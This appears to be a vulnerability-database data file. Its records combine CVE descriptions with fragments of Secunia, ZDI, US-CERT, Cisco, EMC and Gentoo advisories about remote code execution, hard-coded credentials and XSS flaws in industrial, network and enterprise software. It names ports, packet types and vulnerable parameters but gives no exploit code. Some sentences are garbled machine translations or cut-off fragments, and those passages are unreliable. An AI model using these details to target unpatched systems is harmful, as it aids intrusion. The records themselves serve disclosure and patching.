Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability.The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google of Android Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUDUFHFVtgMGTo1scAQJ1Twf8C0MRiovFv7JVpAgg+lOYT3HW7MYdUKAx /I+4hvkGyeKKCCkvIOkx0y7eSdwp4paxVZAd0WYTfsG0K1h+bBngt6m+3Nicx0Iq YuqyOluJTW4ymXUSwvX8MZ39709DQXEl5yp9JvIX+Dc4WY7TKauGYKIfbb/VRMQq VYgQPhnlv8laGORlVREpu+yrOPdYLbQSucewpaLXd4b8uw1+Kmurjepiil5vxqPD G3fD23i1jGrbg6aX0AlvECo1M12alERft7wjtI21D7VP7G3uBYwiAJ8jxutavMQY Yf5K6rzdbx+96MuFco7aYB49GBQDpMYvWeWur3YEv1GqR7bSotpO1Q== =Yxrq -----END PGP SIGNATURE-----
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. D-Link Systems, Inc. of dwr-2000m Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: 